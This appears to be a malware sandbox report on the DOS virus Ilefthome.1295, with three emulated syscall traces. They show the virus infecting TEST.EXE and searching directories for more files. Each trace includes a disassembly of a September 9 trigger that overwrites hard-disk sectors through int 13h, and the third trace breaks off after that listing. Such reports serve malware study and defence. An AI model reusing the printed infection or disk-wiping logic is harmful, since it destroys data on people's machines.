Sample viewer

vx.netlux.org/Virus.DOS.Ilefthome.1295


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:44:46.32049511Z 25 PC: 12b88 | Get default drive
2018-12-17T22:44:46.322224987Z 71 PC: 12b9b | Get current directory
2018-12-17T22:44:46.326402148Z 26 PC: 12ba3 | Set disk transfer address
2018-12-17T22:44:46.328110925Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.335027752Z 61 PC: 12bf4 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:44:46.341472996Z 63 PC: 12c03 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:44:46.343956041Z 62 PC: 12c07 | Close file
2018-12-17T22:44:46.345964491Z 67 PC: 12c25 | Get or set file attributes
2018-12-17T22:44:46.362760949Z 61 PC: 12c33 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:44:46.371269993Z 63 PC: 12c43 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:44:46.374032893Z 66 PC: 12c73 | Move file pointer
2018-12-17T22:44:46.376363286Z 64 PC: 12c7e | Write file or device (Write 256 bytes on handle 5)
2018-12-17T22:44:46.384482009Z 64 PC: 12c89 | Write file or device (Write 350 bytes on handle 5)
2018-12-17T22:44:46.394182492Z 64 PC: 12c94 | Write file or device (Write 689 bytes on handle 5)
2018-12-17T22:44:46.404621889Z 66 PC: 12cdd | Move file pointer
2018-12-17T22:44:46.406591253Z 66 PC: 12cf5 | Move file pointer
2018-12-17T22:44:46.408470767Z 64 PC: 12d00 | Write file or device (Write 28 bytes on handle 5)
2018-12-17T22:44:46.413136501Z 87 PC: 12d15 | Get or set file date and time
2018-12-17T22:44:46.415166215Z 62 PC: 12d19 | Close file
2018-12-17T22:44:46.439536174Z 67 PC: 12d29 | Get or set file attributes
2018-12-17T22:44:46.450234327Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.454872434Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.461072378Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.464624124Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.466891589Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.472932324Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.475999795Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.478150461Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.488841429Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.491446818Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.494521617Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.505756643Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.508579539Z 42 PC: 12d7e | Get date
0x12d7e: cmp dx, 0x909
0x12d82: jne 0x12dff
0x12d84: mov ah, 8
0x12d86: int 0x13
0x12d88: xchg dh, dl
0x12d8a: xor dh, dh
0x12d8c: mov si, dx
0x12d8e: mov dh, 0
0x12d90: mov dl, 0x80
0x12d92: mov cx, 1
0x12d95: cli
0x12d96: mov ax, 0x30f
0x12d99: int 0x13
0x12d9b: inc dh
0x12d9d: inc ch
0x12d9f: dec si
0x12da0: jne 0x12d95
0x12da2: mov ax, 0xd
0x12da5: int 0x10
0x12da7: mov ah, 0xe
2018-12-17T22:44:46.510978698Z 59 PC: 12d5d | Change current directory
2018-12-17T22:44:46.514927256Z 26 PC: 12d6d | Set disk transfer address
2018-12-17T22:44:46.51601684Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-17T22:44:46.531441677Z 76 PC: 12acc | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8319,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:04:19.65284994Z 25 PC: 12b88 | Get default drive
2018-12-25T12:04:19.654029979Z 71 PC: 12b9b | Get current directory
2018-12-25T12:04:19.656119192Z 26 PC: 12ba3 | Set disk transfer address
2018-12-25T12:04:19.657108218Z 78 PC: 12bd7 | Find first file
2018-12-25T12:04:19.661344761Z 61 PC: 12bf4 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:19.665472689Z 63 PC: 12c03 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T12:04:19.667113658Z 62 PC: 12c07 | Close file
2018-12-25T12:04:19.668495759Z 67 PC: 12c25 | Get or set file attributes
2018-12-25T12:04:20.74042517Z 61 PC: 12c33 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:20.748061711Z 63 PC: 12c43 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T12:04:20.752266612Z 66 PC: 12c73 | Move file pointer
2018-12-25T12:04:20.753682898Z 64 PC: 12c7e | Write file or device (Write 256 bytes on handle 5)
2018-12-25T12:04:20.850911868Z 64 PC: 12c89 | Write file or device (Write 350 bytes on handle 5)
2018-12-25T12:04:20.959331197Z 64 PC: 12c94 | Write file or device (Write 689 bytes on handle 5)
2018-12-25T12:04:20.984638212Z 66 PC: 12cdd | Move file pointer
2018-12-25T12:04:20.985939054Z 66 PC: 12cf5 | Move file pointer
2018-12-25T12:04:20.987057866Z 64 PC: 12d00 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T12:04:20.990060287Z 87 PC: 12d15 | Get or set file date and time
2018-12-25T12:04:20.991295181Z 62 PC: 12d19 | Close file
2018-12-25T12:04:20.9965394Z 67 PC: 12d29 | Get or set file attributes
2018-12-25T12:04:21.003300203Z 59 PC: 12e04 | Change current directory
2018-12-25T12:04:21.006059726Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.009783195Z 79 PC: 12bdf | Find next file
2018-12-25T12:04:21.011716167Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:21.013006159Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.016730209Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:21.018936023Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:21.020200588Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.026943287Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:21.028803726Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:21.030092695Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.036775639Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:21.038309046Z 42 PC: 12d7e | Get date
0x12d7e: cmp dx, 0x909
0x12d82: jne 0x12dff
0x12d84: mov ah, 8
0x12d86: int 0x13
0x12d88: xchg dh, dl
0x12d8a: xor dh, dh
0x12d8c: mov si, dx
0x12d8e: mov dh, 0
0x12d90: mov dl, 0x80
0x12d92: mov cx, 1
0x12d95: cli
0x12d96: mov ax, 0x30f
0x12d99: int 0x13
0x12d9b: inc dh
0x12d9d: inc ch
0x12d9f: dec si
0x12da0: jne 0x12d95
0x12da2: mov ax, 0xd
0x12da5: int 0x10
0x12da7: mov ah, 0xe
2018-12-25T12:04:21.040119623Z 59 PC: 12d5d | Change current directory
2018-12-25T12:04:21.045733454Z 26 PC: 12d6d | Set disk transfer address
2018-12-25T12:04:21.046643851Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-25T12:04:21.055029848Z 76 PC: 12acc | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":9,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8319,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:04:19.917212283Z 25 PC: 12b88 | Get default drive
2018-12-25T12:04:19.918771036Z 71 PC: 12b9b | Get current directory
2018-12-25T12:04:19.921574097Z 26 PC: 12ba3 | Set disk transfer address
2018-12-25T12:04:19.922748545Z 78 PC: 12bd7 | Find first file
2018-12-25T12:04:19.928998356Z 61 PC: 12bf4 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:19.935421004Z 63 PC: 12c03 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T12:04:19.937830773Z 62 PC: 12c07 | Close file
2018-12-25T12:04:19.939766751Z 67 PC: 12c25 | Get or set file attributes
2018-12-25T12:04:19.958433468Z 61 PC: 12c33 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:19.969542119Z 63 PC: 12c43 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T12:04:19.975763428Z 66 PC: 12c73 | Move file pointer
2018-12-25T12:04:19.977832878Z 64 PC: 12c7e | Write file or device (Write 256 bytes on handle 5)
2018-12-25T12:04:19.986892693Z 64 PC: 12c89 | Write file or device (Write 350 bytes on handle 5)
2018-12-25T12:04:19.994918432Z 64 PC: 12c94 | Write file or device (Write 689 bytes on handle 5)
2018-12-25T12:04:20.003006476Z 66 PC: 12cdd | Move file pointer
2018-12-25T12:04:20.004329157Z 66 PC: 12cf5 | Move file pointer
2018-12-25T12:04:20.005575436Z 64 PC: 12d00 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T12:04:20.008608026Z 87 PC: 12d15 | Get or set file date and time
2018-12-25T12:04:20.009970252Z 62 PC: 12d19 | Close file
2018-12-25T12:04:20.021897887Z 67 PC: 12d29 | Get or set file attributes
2018-12-25T12:04:20.03328764Z 59 PC: 12e04 | Change current directory
2018-12-25T12:04:20.037733152Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.043938244Z 79 PC: 12bdf | Find next file
2018-12-25T12:04:20.048557654Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:20.050399844Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.056642533Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:20.059843302Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:20.061927998Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.067896785Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:20.070573926Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:20.072456183Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.07821056Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:20.080532529Z 42 PC: 12d7e | Get date
0x12d7e: cmp dx, 0x909
0x12d82: jne 0x12dff
0x12d84: mov ah, 8
0x12d86: int 0x13
0x12d88: xchg dh, dl
0x12d8a: xor dh, dh
0x12d8c: mov si, dx
0x12d8e: mov dh, 0
0x12d90: mov dl, 0x80
0x12d92: mov cx, 1
0x12d95: cli
0x12d96: mov ax, 0x30f
0x12d99: int 0x13
0x12d9b: inc dh
0x12d9d: inc ch
0x12d9f: dec si
0x12da0: jne 0x12d95
0x12da2: mov ax, 0xd
0x12da5: int 0x10
0x12da7: mov ah, 0xe